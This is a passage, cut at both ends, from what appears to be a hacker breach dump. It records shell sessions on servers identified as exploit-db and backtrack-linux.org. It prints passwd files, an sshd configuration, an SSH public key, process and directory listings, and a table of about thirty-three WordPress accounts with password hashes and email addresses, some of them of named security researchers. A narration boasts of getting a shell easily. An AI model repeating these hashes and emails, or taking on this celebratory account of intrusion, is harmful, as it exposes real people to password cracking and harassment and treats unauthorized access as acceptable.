+lp:x:7:7:lp:/var/spool/lpd:/bin/sh +mail:x:8:8:mail:/var/mail:/bin/sh +news:x:9:9:news:/var/spool/news:/bin/sh +uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh +proxy:x:13:13:proxy:/bin:/bin/sh +www-data:x:33:33:www-data:/var/www:/bin/sh +backup:x:34:34:backup:/var/backups:/bin/sh +list:x:38:38:Mailing List Manager:/var/list:/bin/sh +irc:x:39:39:ircd:/var/run/ircd:/bin/sh +gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh +nobody:x:65534:65534:nobody:/nonexistent:/bin/sh +libuuid:x:100:101::/var/lib/libuuid:/bin/sh +syslog:x:101:103::/home/syslog:/bin/false +sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin +landscape:x:103:108::/var/lib/landscape:/bin/false +mysql:x:104:112:MySQL Server,,,:/var/lib/mysql:/bin/false +smmta:x:105:114:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false +smmsp:x:106:115:Mail Submission Program,,,:/var/lib/sendmail:/bin/false +emgent:x:1003:1002:,,,:/home/emgent:/bin/bash +ossec:x:1004:1003::/var/ossec:/bin/false +ossecm:x:1005:1003::/var/ossec:/bin/false +ossecr:x:1006:1003::/var/ossec:/bin/false + +$ cat /etc/issue +Ubuntu 10.04.1 LTS \n \l + + +$ cat /etc/ssh/sshd_config +# Package generated configuration file +# See the sshd_config(5) manpage for details + +# What ports, IPs and protocols we listen for +Port 22 +# Use these options to restrict which interfaces/protocols sshd will bind to +#ListenAddress :: +#ListenAddress 0.0.0.0 +Protocol 2 +# HostKeys for protocol version 2 +HostKey /etc/ssh/ssh_host_rsa_key +HostKey /etc/ssh/ssh_host_dsa_key +#Privilege Separation is turned on for security +UsePrivilegeSeparation yes + +# Lifetime and size of ephemeral version 1 server key +KeyRegenerationInterval 3600 +ServerKeyBits 768 + +# Logging +SyslogFacility AUTH +LogLevel INFO + +# Authentication: +LoginGraceTime 120 +PermitRootLogin yes +StrictModes yes + +RSAAuthentication yes +PubkeyAuthentication yes +#AuthorizedKeysFile %h/.ssh/authorized_keys + +# Don't read the user's ~/.rhosts and ~/.shosts files +IgnoreRhosts 
yes +# For this to work you will also need host keys in /etc/ssh_known_hosts +RhostsRSAAuthentication no +# similar for protocol version 2 +HostbasedAuthentication no +# Uncomment if you don't trust ~/.ssh/known_hosts for RhostsRSAAuthentication +#IgnoreUserKnownHosts yes + +# To enable empty passwords, change to yes (NOT RECOMMENDED) +PermitEmptyPasswords no + +# Change to yes to enable challenge-response passwords (beware issues with +# some PAM modules and threads) +ChallengeResponseAuthentication no + +# Change to no to disable tunnelled clear text passwords +PasswordAuthentication yes + +# Kerberos options +#KerberosAuthentication no +#KerberosGetAFSToken no +#KerberosOrLocalPasswd yes +#KerberosTicketCleanup yes + +# GSSAPI options +#GSSAPIAuthentication no +#GSSAPICleanupCredentials yes + +X11Forwarding yes +X11DisplayOffset 10 +PrintMotd no +PrintLastLog yes +TCPKeepAlive yes +#UseLogin no + +#MaxStartups 10:30:60 +#Banner /etc/issue.net + +# Allow client to pass locale environment variables +AcceptEnv LANG LC_* + +Subsystem sftp /usr/lib/openssh/sftp-server + +# Set this to 'yes' to enable PAM authentication, account processing, +# and session processing. If this is enabled, PAM authentication will +# be allowed through the ChallengeResponseAuthentication and +# PasswordAuthentication. Depending on your PAM configuration, +# PAM authentication via ChallengeResponseAuthentication may bypass +# the setting of "PermitRootLogin without-password". +# If you just want the PAM account and session checks to run without +# PAM authentication, then enable this but set PasswordAuthentication +# and ChallengeResponseAuthentication to 'no'. +UsePAM yes + +$ cd /home + +$ ls -la +total 12 +drwxr-xr-x 3 root root 4096 Aug 3 11:48 . +drwxr-xr-x 26 root root 4096 Nov 30 06:53 .. +drwxr-xr-x 7 emgent emgent 4096 Aug 7 07:45 emgent + +$ cd emgent + +$ ls -la +total 48 +drwxr-xr-x 7 emgent emgent 4096 Aug 7 07:45 . +drwxr-xr-x 3 root root 4096 Aug 3 11:48 .. 
+-rw------- 1 emgent emgent 259 Oct 18 11:39 .bash_history +-rw-r--r-- 1 emgent emgent 220 Aug 3 11:48 .bash_logout +-rw-r--r-- 1 emgent emgent 3103 Aug 3 11:48 .bashrc +drwx------ 2 emgent emgent 4096 Aug 3 11:49 .cache +drwx------ 2 emgent emgent 4096 Aug 3 11:49 .irssi +-rw------- 1 emgent emgent 9 Aug 3 11:50 .nano_history +-rw-r--r-- 1 emgent emgent 675 Aug 3 11:48 .profile +drwxr-xr-x 2 emgent emgent 4096 Aug 3 11:49 .ssh +drwxr-xr-x 3 emgent emgent 4096 Aug 7 07:45 .subversion +drwxr-xr-x 4 emgent emgent 4096 Aug 7 07:46 exploitdb + + + +$ cd .ssh + +$ ls +authorized_keys +cat authorized_keys +ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAntXlep19oECqVocmK6UIhsxI5yGQSPUVYWOZXWO7Q0wP9vF5FfHmE4yCmKt+MleWcPWkkbI6IXBt9TNtw7m6usPx2IEbpEVr8sl7pT8hiW8tKNew74gEEgE53AGLhWr/+vViL+5K4SKCt591oABDtWA6KIEOuyx9/jqLLwBTQP0UyrqIJpR9VhQ2GQ6tN6Y+LV4tvpqy8ehevsIqdj+HvdsvVU2sREJsSH5xAncaRJQ1sfQepyeAwi7yZ1fBT4U4/LlukkBLIqjXk2D6jPZG870R4KCEI280rBJ9DX4fPX9qvYUwOm/OtWwxC7kivuCnNM1v2wBRUVCBmSUimqWnpQ== emgent@enJoy + +$ ps aux +USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND +root 1 0.0 0.0 23680 1244 ? Ss Nov11 0:07 /sbin/init +root 2 0.0 0.0 0 0 ? S Nov11 0:00 [kthreadd] +root 3 0.0 0.0 0 0 ? S Nov11 0:01 [migration/0] +root 4 0.0 0.0 0 0 ? S Nov11 0:12 [ksoftirqd/0] +root 5 0.0 0.0 0 0 ? S Nov11 0:00 [watchdog/0] +root 6 0.0 0.0 0 0 ? S Nov11 0:02 [migration/1] +root 7 0.0 0.0 0 0 ? S Nov11 0:04 [ksoftirqd/1] +root 8 0.0 0.0 0 0 ? S Nov11 0:00 [watchdog/1] +root 9 0.0 0.0 0 0 ? S Nov11 0:02 [migration/2] +root 10 0.0 0.0 0 0 ? S Nov11 0:02 [ksoftirqd/2] +root 11 0.0 0.0 0 0 ? S Nov11 0:00 [watchdog/2] +root 12 0.0 0.0 0 0 ? S Nov11 0:01 [migration/3] +root 13 0.0 0.0 0 0 ? S Nov11 0:05 [ksoftirqd/3] +root 14 0.0 0.0 0 0 ? S Nov11 0:00 [watchdog/3] +root 15 0.0 0.0 0 0 ? S Nov11 0:32 [events/0] +root 16 0.0 0.0 0 0 ? S Nov11 13:44 [events/1] +root 17 0.0 0.0 0 0 ? S Nov11 0:17 [events/2] +root 18 0.0 0.0 0 0 ? S Nov11 0:18 [events/3] +root 19 0.0 0.0 0 0 ? 
S Nov11 0:00 [cpuset] +root 20 0.0 0.0 0 0 ? S Nov11 0:00 [khelper] +root 21 0.0 0.0 0 0 ? S Nov11 0:00 [netns] +root 22 0.0 0.0 0 0 ? S Nov11 0:00 [async/mgr] +root 23 0.0 0.0 0 0 ? S Nov11 0:00 [pm] +root 25 0.0 0.0 0 0 ? S Nov11 0:02 [sync_supers] +root 26 0.0 0.0 0 0 ? S Nov11 0:04 [bdi-default] +root 27 0.0 0.0 0 0 ? S Nov11 0:00 [kintegrityd/0] +root 28 0.0 0.0 0 0 ? S Nov11 0:00 [kintegrityd/1] +root 29 0.0 0.0 0 0 ? S Nov11 0:00 [kintegrityd/2] +root 30 0.0 0.0 0 0 ? S Nov11 0:00 [kintegrityd/3] +root 31 0.0 0.0 0 0 ? S Nov11 11:09 [kblockd/0] +root 32 0.0 0.0 0 0 ? S Nov11 2:17 [kblockd/1] +root 33 0.0 0.0 0 0 ? S Nov11 1:33 [kblockd/2] +root 34 0.0 0.0 0 0 ? S Nov11 1:14 [kblockd/3] +root 35 0.0 0.0 0 0 ? S Nov11 0:00 [kacpid] +root 36 0.0 0.0 0 0 ? S Nov11 0:00 [kacpi_notify] +root 37 0.0 0.0 0 0 ? S Nov11 0:00 [kacpi_hotplug] +root 38 0.0 0.0 0 0 ? S Nov11 0:00 [ata/0] +root 39 0.0 0.0 0 0 ? S Nov11 0:00 [ata/1] +root 40 0.0 0.0 0 0 ? S Nov11 0:00 [ata/2] +root 41 0.0 0.0 0 0 ? S Nov11 0:00 [ata/3] +root 42 0.0 0.0 0 0 ? S Nov11 0:00 [ata_aux] +root 43 0.0 0.0 0 0 ? S Nov11 0:00 [ksuspend_usbd] +root 44 0.0 0.0 0 0 ? S Nov11 0:00 [khubd] +root 45 0.0 0.0 0 0 ? S Nov11 0:00 [kseriod] +root 46 0.0 0.0 0 0 ? S Nov11 0:00 [kmmcd] +root 51 0.0 0.0 0 0 ? S Nov11 0:00 [khungtaskd] +root 52 0.0 0.0 0 0 ? S Nov11 0:30 [kswapd0] +root 53 0.0 0.0 0 0 ? SN Nov11 0:00 [ksmd] +root 54 0.0 0.0 0 0 ? S Nov11 0:00 [aio/0] +root 55 0.0 0.0 0 0 ? S Nov11 0:00 [aio/1] +root 56 0.0 0.0 0 0 ? S Nov11 0:00 [aio/2] +root 57 0.0 0.0 0 0 ? S Nov11 0:00 [aio/3] +root 58 0.0 0.0 0 0 ? S Nov11 0:00 [ecryptfs-kthrea] +root 59 0.0 0.0 0 0 ? S Nov11 0:00 [crypto/0] +root 60 0.0 0.0 0 0 ? S Nov11 0:00 [crypto/1] +root 61 0.0 0.0 0 0 ? S Nov11 0:00 [crypto/2] +root 62 0.0 0.0 0 0 ? S Nov11 0:00 [crypto/3] +root 65 0.0 0.0 0 0 ? S Nov11 0:00 [pciehpd] +root 66 0.0 0.0 0 0 ? S Nov11 0:00 [scsi_eh_0] +root 67 0.0 0.0 0 0 ? S Nov11 0:00 [scsi_eh_1] +root 69 0.0 0.0 0 0 ? 
S Nov11 0:00 [kstriped] +root 70 0.0 0.0 0 0 ? S Nov11 0:00 [kmpathd/0] +root 71 0.0 0.0 0 0 ? S Nov11 0:00 [kmpathd/1] +root 72 0.0 0.0 0 0 ? S Nov11 0:00 [kmpathd/2] +root 73 0.0 0.0 0 0 ? S Nov11 0:00 [kmpathd/3] +root 74 0.0 0.0 0 0 ? S Nov11 0:00 [kmpath_handlerd] +root 75 0.0 0.0 0 0 ? S Nov11 0:00 [ksnapd] +root 76 0.0 0.0 0 0 ? S Nov11 0:00 [kondemand/0] +root 77 0.0 0.0 0 0 ? S Nov11 0:00 [kondemand/1] +root 78 0.0 0.0 0 0 ? S Nov11 0:00 [kondemand/2] +root 79 0.0 0.0 0 0 ? S Nov11 0:00 [kondemand/3] +root 80 0.0 0.0 0 0 ? S Nov11 0:00 [kconservative/0] +root 81 0.0 0.0 0 0 ? S Nov11 0:00 [kconservative/1] +root 82 0.0 0.0 0 0 ? S Nov11 0:00 [kconservative/2] +root 83 0.0 0.0 0 0 ? S Nov11 0:00 [kconservative/3] +root 191 0.0 0.0 0 0 ? S Nov11 1:03 [mpt_poll_0] +root 192 0.0 0.0 0 0 ? S Nov11 0:00 [mpt/0] +root 268 0.0 0.0 0 0 ? S Nov11 0:00 [scsi_eh_2] +root 285 0.3 0.0 0 0 ? S Nov11 125:09 [jbd2/sda1-8] +root 286 0.0 0.0 0 0 ? S Nov11 0:00 [ext4-dio-unwrit] +root 287 0.0 0.0 0 0 ? S Nov11 0:00 [ext4-dio-unwrit] +root 288 0.0 0.0 0 0 ? S Nov11 0:00 [ext4-dio-unwrit] +root 289 0.0 0.0 0 0 ? S Nov11 0:00 [ext4-dio-unwrit] +root 322 0.3 0.0 0 0 ? S Nov11 115:40 [flush-8:0] +root 347 0.0 0.0 16904 640 ? S Nov11 0:00 upstart-udev-bridge --daemon +root 363 0.0 0.0 16920 416 ? S +root 14387 0.0 0.0 0 0 ? Z 15:07 0:00 [firewall-drop.s] +www-data 14407 0.4 0.5 354384 32672 ? S 15:07 0:00 /usr/sbin/apache2 -k start +www-data 14408 0.1 0.4 352604 29276 ? S 15:07 0:00 /usr/sbin/apache2 -k start +www-data 14412 0.3 0.5 354716 32420 ? S 15:08 0:00 /usr/sbin/apache2 -k start +www-data 14413 0.4 0.4 352592 29272 ? S 15:08 0:00 /usr/sbin/apache2 -k start +www-data 14414 0.2 0.4 352600 28200 ? S 15:08 0:00 /usr/sbin/apache2 -k start +www-data 14415 0.3 0.4 352724 29088 ? S 15:08 0:00 /usr/sbin/apache2 -k start +www-data 14416 0.2 0.4 353776 29452 ? S 15:08 0:00 /usr/sbin/apache2 -k start +www-data 14417 0.2 0.4 353136 28616 ? 
S 15:08 0:00 /usr/sbin/apache2 -k start +www-data 14418 0.3 0.4 353520 29500 ? S 15:08 0:00 /usr/sbin/apache2 -k start +www-data 14419 0.7 0.0 0 0 ? Z 15:08 0:00 [apache2] +www-data 14420 0.5 0.5 353976 31084 ? S 15:08 0:00 /usr/sbin/apache2 -k start +www-data 14421 0.3 0.4 353252 29180 ? S 15:08 0:00 /usr/sbin/apache2 -k start +www-data 14422 0.0 0.1 346724 8076 ? S 15:08 0:00 /usr/sbin/apache2 -k start +www-data 14423 0.6 0.5 354352 31720 ? S 15:08 0:00 /usr/sbin/apache2 -k start +www-data 14424 0.4 0.4 353808 29848 ? S 15:08 0:00 /usr/sbin/apache2 -k start +www-data 14425 0.3 0.4 352584 28252 ? S 15:08 0:00 /usr/sbin/apache2 -k start +www-data 14426 0.1 0.1 346748 10564 ? S 15:08 0:00 /usr/sbin/apache2 -k start +www-data 14427 0.6 0.4 352976 28944 ? S 15:08 0:00 /usr/sbin/apache2 -k start +www-data 14428 0.0 0.1 346724 8204 ? S 15:08 0:00 /usr/sbin/apache2 -k start +www-data 14429 0.0 0.1 346724 8196 ? S 15:08 0:00 /usr/sbin/apache2 -k start +www-data 14430 0.7 0.4 352976 29032 ? S 15:08 0:00 /usr/sbin/apache2 -k start +www-data 14431 0.9 0.4 353668 30120 ? S 15:08 0:00 /usr/sbin/apache2 -k start +www-data 14432 0.9 0.4 353368 29668 ? S 15:08 0:00 /usr/sbin/apache2 -k start +www-data 14433 0.8 0.4 352976 28836 ? S 15:08 0:00 /usr/sbin/apache2 -k start +www-data 14435 1.3 0.4 352716 29364 ? S 15:08 0:00 /usr/sbin/apache2 -k start +www-data 14436 1.8 0.4 353736 30320 ? S 15:08 0:00 /usr/sbin/apache2 -k start +www-data 14437 0.1 0.1 346236 7760 ? S 15:08 0:00 /usr/sbin/apache2 -k start +www-data 14438 0.0 0.0 14976 1116 ? R 15:08 0:00 ps aux +root 19786 0.0 0.0 107420 1884 ? S Nov16 0:00 /usr/bin/svnserve -d -r /var/svn/ +root 19983 0.0 0.0 107420 1940 ? S Nov29 0:00 /usr/bin/svnserve -d -r /var/svn/ +root 19989 0.0 0.0 107420 1884 ? S Nov16 0:00 /usr/bin/svnserve -d -r /var/svn/ +root 20015 0.0 0.0 107420 1884 ? S Nov16 0:00 /usr/bin/svnserve -d -r /var/svn/ +root 20286 0.0 0.0 107420 1888 ? 
S Nov18 0:00 /usr/bin/svnserve -d -r /var/svn/ +mysql 22394 10.4 24.9 2441860 1529604 ? Ssl Nov12 3357:17 /usr/sbin/mysqld + +$ df -h +Filesystem Size Used Avail Use% Mounted on +/dev/sda1 48G 17G 29G 37% / +none 3.0G 172K 3.0G 1% /dev +none 3.0G 0 3.0G 0% /dev/shm +none 3.0G 56K 3.0G 1% /var/run +none 3.0G 0 3.0G 0% /var/lock +none 3.0G 0 3.0G 0% /lib/init/rw +none 48G 17G 29G 37% /var/lib/ureadahead/debugfs + +Wordpress: +admin:$P$B./Y8qG9A2YuqIz4uBAjFRo.9Yv0Fb1::muts@offsec.com +dookie2000ca:$P$B7YVdu0JG/JOf2YAS8WsmQqHnZHf.b/:dookie2000ca:dookie@exploit-db.com +innrwrld:$P$BaJi4YkAt5o/paWUfDMdOOWuqHx/is/:innrwrld:innrwrld@exploit-db.com +ivan:$P$B/YVWEkaYIq3s2QLSmVB/wvXWYqoM80::centaur.mail@gmail.com +sinn3r:$P$BYzu/ozErhWi8hB8IPFdr6Tv2R9rat/:3r:sinn3r@exploit-db.com +loneferret:$P$Bgsl0.nlu4De51qkI8MDoeHDS6iLcM1:loneferret:loneferret@exploit-db.com +ronin:$P$BFw9OFuWa1s/t5DUJwKO6A0Otfkewo0::ronin@exploit-db.com +dijital1:$P$BirOcybWYDo/Z/wrJ5zBq2zaGElV.f/:dijital1:rlh@ciphermonk.net +emgent:$P$BYiha9WKXDzXQm8A8RXboRc7zZuus0.::emgent@backtrack-linux.org +j0fer:$P$Bgtsc7w.Vb6mCkJfJi7JkSO5zJUEBY.::j0fer@exploit-db.com +ReL1K:$P$B6DyRPNYrBuC.WRv5GrDnFg3wAQPo91::kennedyd013@gmail.com +Xpl0it:$P$BGBdVhFBaUM8s9ooGcmB01t.zoK.0V0::mr.xpl0it@gmail.com +fdiskyou:$P$BlgwWd3EmVg4SsfIxzOjqUQfGKfLZD0:fdiskyou:rui@exploit-db.com +rawjaw:$P$Bovffv59pNKpCOOvKlbGqFOmAh.HKb0::rawjaw@exploit-db.com +djokica:$P$BNeyg6NPYJWO9fzjfZs1okvMiM0vq51::centaur@pavko.info +xxDigiPxx:$P$B2eEGgTNsZnM4DFpIr4kNrKXv.ivyg/:xxdigipxx:xxtwistedpairxx@comcast.net +muts:$P$Bn.MAuG.OlZ1NtTxq0WWAUwhVEfusC.::muts@offensive-security.com +Ryujin:$P$BZ75UnhRqkJZj82bWfXbeD6dVxzXTG0::ryujin@offsec.com +didn0t:$P$BkGM.gSmmmuDlkJUKjCzy1LfUn9AnS.::paul@pizza.org +zelik:$P$BYjCAaqW0tcdNV3MZviRZoN./.HMKn0::tal.zeltzer@gmail.com +bitform:$P$BLk7y3.7JTn12lRYj25A/JXJ1W0SIA1::mattgraeber@gmail.com +bolexxx:$P$B1liji1bDZoOOwnVwV3Aa59Mqux0FC1::bolexxx@offsec.com 
+h00die:$P$Behl/g/GHQo5zxciUMgjPPzu7ZI8nO/::ragecyr@exploit-db.com +MaXe:$P$B6PKmgTlcm5L5kpysXfksmEmRfMy6U.::MaXe@intern0t.net +marked_doe:$P$By1rR96ByDsyil/yQa79qBE/A7nbOA1:marked_doe:marc@doudiet.net +code0wnz:$P$Bw1OuJHHzMtUBd8oSjmFoQYKtzjaC..:code0wnz:code0wnz@gmail.com +Dr_IDE:$P$BR.ReeHZDabreI8G0D5NARv8oY6SOP/::dr_ide@hushmail.com +Sud0:$P$BqovGmeqOSCzsHFso9q4goSZ4hkWbK1: :Sud0.x90@gmail.com +TecR0c:$P$BXoaJm6vL1VKJWz.K3m1M.XXVoXU9K/::tecr0c@corelan.be +kripthor:$P$BpUEGtZ3PvzfYotKDvvRA1AU9U4.iq1:kripthor:umbelino@crazydog.pt +ryp:$P$BwQ3FGe9q7spL3vkhxTyYMBkL4UGOQ.::adam@rypmarketing.com +fdisk:$P$Blv3X9wG6b/Yo3SDi22/nIJ34t2jGi/::ruifilipe.reis@gmail.com +root-boy:$P$BWq8dOxSe/HKG/kE3cXpGyAOgR6F.n1:root-boy:root-boy@exploit-db.com + +,_._._._._._._._|____________________________________________________ +|_|_|_|_|_|_|_|_|___________________________________________________/ + ~ backtrack ~ ! + +Since we already tapped into exploit-db and their server lies in the +same subnet with backtrack, we decided to check out their mad +security. Backtrack is run by muts, the same guy who also administers +exploit-db, so no wonder why it was super easy to get a shell... + + +$ uname -a +Linux backtrack-linux.org 2.6.32.26-175.fc12.x86_64 #1 SMP Wed Dec 1 21:39:34 UTC 2010 x86_64 x86_64 x86_64 GNU/Linux + +$ id +uid=48(apache) gid=494(apache) groups=494(apache) context=unconfined_u:system_r:httpd_t:s0 + +$ alias ls="ls -la" + +$ ls +total 110 +dr-xr-xr-x. 25 root root 4096 Dec 7 08:42 . +dr-xr-xr-x. 25 root root 4096 Dec 7 08:42 .. +-rw-r--r--. 1 root root 0 Dec 7 08:42 .autofsck +drwx------. 2 root root 4096 Dec 10 03:40 backup +dr-xr-xr-x. 2 root root 4096 Nov 29 19:59 bin +dr-xr-xr-x. 5 root root 1024 Dec 7 08:41 boot +drwxr-xr-x. 17 root root 3580 Dec 7 08:43 dev +drwxr-xr-x. 66 root root 4096 Dec 7 08:42 etc +drwxr-xr-x. 3 root root 4096 Aug 14 20:50 home +dr-xr-xr-x. 9 root root 4096 Aug 11 04:01 lib +dr-xr-xr-x. 9 root root 12288 Nov 29 20:00 lib64 +drwx------. 
2 root root 16384 Aug 11 02:01 lost+found +drwxr-xr-x. 2 root root 4096 Aug 11 04:42 maint +drwxr-xr-x. 2 root root 4096 Aug 25 2009 media +drwxr-xr-x. 2 root root 4096 Aug 25 2009 mnt +drwxr-xr-x. 2 root root 4096 Aug 25 2009 opt +dr-xr-xr-x. 160 root root 0 Dec 7 08:42 proc +drwxr-xr-x. 5 root root 4096 Dec 3 17:16 recovery +dr-xr-x---. 4 root root 4096 Dec 10 08:50 root +dr-xr-xr-x. 2 root root 12288 Nov 29 19:59 sbin +drwxr-xr-x. 7 root root 0 Dec 7 08:42 selinux +drwxr-xr-x. 2 root root 4096 Aug 25 2009 srv +drwxr-xr-x. 13 root root 0 Dec 7 08:42 sys +drwxrwxrwt. 4 root root 4096 Dec 10 14:08 tmp +drwxr-xr-x. 14 root root 4096 Aug 11 02:03 usr +drwxr-xr-x. 20 root root 4096 Aug 14 20:45 var + + +$ cat /etc/issue +Fedora release 12 (Constantine) +Kernel \r on an \m (\l) + +$ cat /etc/passwd +root:x:0:0:root:/root:/bin/bash +bin:x:1:1:bin:/bin:/sbin/nologin +daemon:x:2:2:daemon:/sbin:/sbin/nologin +adm:x:3:4:adm:/var/adm:/sbin/nologin +lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin +sync:x:5:0:sync:/sbin:/bin/sync +shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown +halt:x:7:0:halt:/sbin:/sbin/halt +mail:x:8:12:mail:/var/spool/mail:/sbin/nologin +uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin +operator:x:11:0:operator:/root:/sbin/nologin +games:x:12:100:games:/usr/games:/sbin/nologin +gopher:x:13:30:gopher:/var/gopher:/sbin/nologin +ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin +nobody:x:99:99:Nobody:/:/sbin/nologin +vcsa:x:69:499:virtual console memory owner:/dev:/sbin/nologin +dbus:x:81:81:System message bus:/:/sbin/nologin +mailnull:x:47:497::/var/spool/mqueue:/sbin/nologin +smmsp:x:51:496::/var/spool/mqueue:/sbin/nologin +sshd:x:74:495:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin +apache:x:48:494:Apache:/var/www:/sbin/nologin +mysql:x:27:493:MySQL Server:/var/lib/mysql:/bin/bash +ossec:x:500:500::/var/ossec:/sbin/nologin +ossecm:x:501:500::/var/ossec:/sbin/nologin +ossecr:x:502:500::/var/ossec:/sbin/nologin +ntp:x:38:38::/etc/ntp:/sbin/nologin 
+tcpdump:x:72:72::/:/sbin/nologin + +$ cd +/var/www/html/ + +$ ls +total 90224 +drwxr-xr-x. 13 apache apache 4096 Dec 9 12:21 . +drwxr-xr-x. 6 root root 4096 Aug 18 10:30 .. +-rw-r--r--. 1 apache apache 4183 Dec 5 16:50 .htaccess +-rw-r--r--. 1 apache apache 1156 Aug 11 03:17 HT +-rw-r--r--. 1 apache apache 2233 Aug 11 03:17 HT-ORIG +-rw-r--r--. 1 apache apache 1526525 Nov 11 14:01 IMG_0585.JPG +drwxr-xr-x. 2 apache apache 4096 Aug 11 03:16 ads +-rw-r--r--. 1 apache apache 125832 Nov 19 12:18 bootsplash.jpg +-rw-r--r--. 1 apache apache 754444 Aug 11 03:16 bt-nsa.png +-rw-r--r--. 1 apache apache 757498 Aug 11 03:16 bt-nsa2.png +-rw-r--r--. 1 apache apache 81597 Aug 11 03:16 bt4-final-vm.zip.torrent +-rw-r--r--. 1 apache apache 60094 Aug 11 03:16 bt4-final.iso.torrent +-rw-r--r--. 1 apache apache 44 Aug 11 03:16 bt4r1.txt +-rw-r--r--. 1 root root 686248 Nov 23 10:47 bt4r2.png +-rw-r--r--. 1 apache apache 160728 Aug 11 03:16 btfail.png +-rw-r--r--. 1 apache apache 476 Aug 11 03:16 collapsible_ad.html +-rwxr-xr-x. 1 apache apache 13397784 Aug 11 03:16 d.bin +-rw-r--r--. 1 apache apache 121 Aug 11 03:16 d.lic +-rw-r--r--. 1 apache apache 12844822 Aug 11 03:16 d32.bin +drwxr-xr-x. 2 apache apache 4096 Aug 11 03:16 documents +-rw-r--r--. 1 apache apache 3342 Aug 11 03:16 down.php +-rw-r--r--. 1 apache apache 4158 Aug 11 03:16 download-orig.php +-rw-r--r--. 1 apache apache 4945 Nov 22 11:38 download.php +-rw-r--r--. 1 apache apache 15125 Aug 11 03:16 error.php +-rw-r--r--. 1 apache apache 137383 Aug 11 03:16 example-2.jpg +-rw-r--r--. 1 apache apache 1150 Aug 11 03:16 favicon.ico +drwxr-xr-x. 21 apache apache 4096 Nov 22 18:56 forums +-rw-r--r--. 1 apache apache 87176 Aug 11 03:17 google.png +-rw-r--r--. 1 apache apache 53 Aug 11 03:17 googled6c4817aa45e0032.html +-rw-r--r--. 1 apache apache 23 Aug 11 03:17 googlehostedservice.html +-rw-r--r--. 1 apache apache 1978856 Sep 17 08:06 hola.jpg +-rw-r--r--. 1 apache apache 2264271 Sep 17 08:12 hola1.jpg +-rw-r--r--. 
1 apache apache 2197361 Sep 17 08:15 hola2.jpg +-rw-r--r--. 1 apache apache 315306 Aug 11 03:17 hola22.png +-rw-r--r--. 1 apache apache 169202 Aug 11 03:17 hola23.png +drwxr-xr-x. 8 apache apache 4096 Nov 21 16:38 images +-rw-r--r--. 1 apache apache 3 Aug 11 03:17 index.html +-rw-r--r--. 1 apache apache 397 Dec 9 12:20 index.php +-rw-r--r--. 1 apache apache 321196 Nov 19 15:06 kanji.png +-rw-r--r--. 1 apache apache 147841 Sep 4 12:37 knock-0.5.tar.gz +-rw-r--r--. 1 apache apache 15410 Dec 9 12:20 license.txt +-rw-r--r--. 1 apache apache 48404480 Nov 14 15:53 mediawiki-1.16.0.tar +-rw-r--r--. 1 apache apache 13946 Aug 11 03:17 nv-xorg.conf +-rw-r--r--. 1 apache apache 1382400 Oct 26 10:38 oiopub-direct.tar +-rw-r--r--. 1 apache apache 1508471 Aug 11 03:17 p2270016.jpg +-rw-r--r--. 1 apache apache 1636957 Aug 11 03:17 p2280018.jpg +drwxr-xr-x. 2 apache apache 4096 Nov 22 11:46 patches +-rw-r--r--. 1 apache apache 582 Nov 22 11:21 r2.php +-rw-r--r--. 1 apache apache 9120 Dec 9 12:20 readme.html +-rw-r--r--. 1 apache apache 712 Nov 10 22:27 s.php +-rw-r--r--. 1 apache apache 63 Aug 11 03:17 show.dud.php +-rw-r--r--. 1 apache apache 801 Aug 11 03:17 show.original.php +-rw-r--r--. 1 apache apache 31 Aug 11 03:17 show.php +-rw-r--r--. 1 apache apache 601 Nov 10 22:28 show.stats.working.php +-rw-r--r--. 1 apache apache 38971 Dec 7 23:23 sitemap.xml +-rw-r--r--. 1 apache apache 2485 Dec 7 23:23 sitemap.xml.gz +drwxr-xr-x. 3 apache apache 4096 Aug 11 03:17 slider +-rw-r--r--. 1 apache apache 714372 Aug 11 03:17 spot-the-release.png +-rw-r--r--. 1 apache apache 1536 Aug 11 03:17 stats.php +-rw-r--r--. 1 apache apache 33 Dec 10 03:34 stats.txt +-rw-r--r--. 1 apache apache 23660 Aug 11 03:17 style.css +-rw-r--r--. 1 apache apache 5 Aug 11 03:17 test.php +drwxr-xr-x. 2 apache apache 4096 Nov 22 09:22 torrents +drwxr-xr-x. 15 apache apache 4096 Nov 27 16:52 wiki +-rw-r--r--. 1 apache apache 4391 Dec 9 12:20 wp-activate.php +drwxr-xr-x. 
8 apache apache 4096 Dec 5 08:12 wp-admin +-rw-r--r--. 1 apache apache 40284 Dec 9 12:20 wp-app.php +-rw-r--r--. 1 apache apache 220 Dec 9 12:20 wp-atom.php +-rw-r--r--. 1 apache apache 274 Dec 9 12:20 wp-blog-header.php +-rw-r--r--. 1 apache apache 3926 Dec 9 12:20 wp-comments-post.php +-rw-r--r--. 1 apache apache 238 Dec 9 12:20 wp-commentsrss2.php +-rw-r--r--. 1 apache apache 3173 Dec 9 12:20 wp-config-sample.php +-rw-r--r--. 1 apache apache 2696 Nov 22 19:32 wp-config.php +drwxr-xr-x. 9 apache apache 4096 Dec 9 12:21 wp-content +-rw-r--r--. 1 apache apache 1255 Dec 9 12:20 wp-cron.php +-rw-r--r--. 1 apache apache 240 Dec 9 12:20 wp-feed.php +drwxr-xr-x. 8 apache apache 4096 Aug 13 20:06 wp-includes +-rw-r--r--. 1 apache apache 2002 Dec 9 12:20 wp-links-opml.php +-rw-r--r--. 1 apache apache 2441 Dec 9 12:20 wp-load.php +-rw-r--r--. 1 apache apache 26059 Dec 9 12:20 wp-login.php +-rw-r--r--. 1 apache apache 7774 Dec 9 12:20 wp-mail.php +-rw-r--r--. 1 apache apache 487 Dec 9 12:20 wp-pass.php +-rw-r--r--. 1 apache apache 218 Dec 9 12:20 wp-rdf.php +-rw-r--r--. 1 apache apache 316 Dec 9 12:20 wp-register.php +-rw-r--r--. 1 apache apache 218 Dec 9 12:20 wp-rss.php +-rw-r--r--. 1 apache apache 220 Dec 9 12:20 wp-rss2.php +-rw-r--r--. 1 apache apache 9177 Dec 9 12:20 wp-settings.php +-rw-r--r--. 1 apache apache 18695 Dec 9 12:20 wp-signup.php +-rw-r--r--. 1 apache 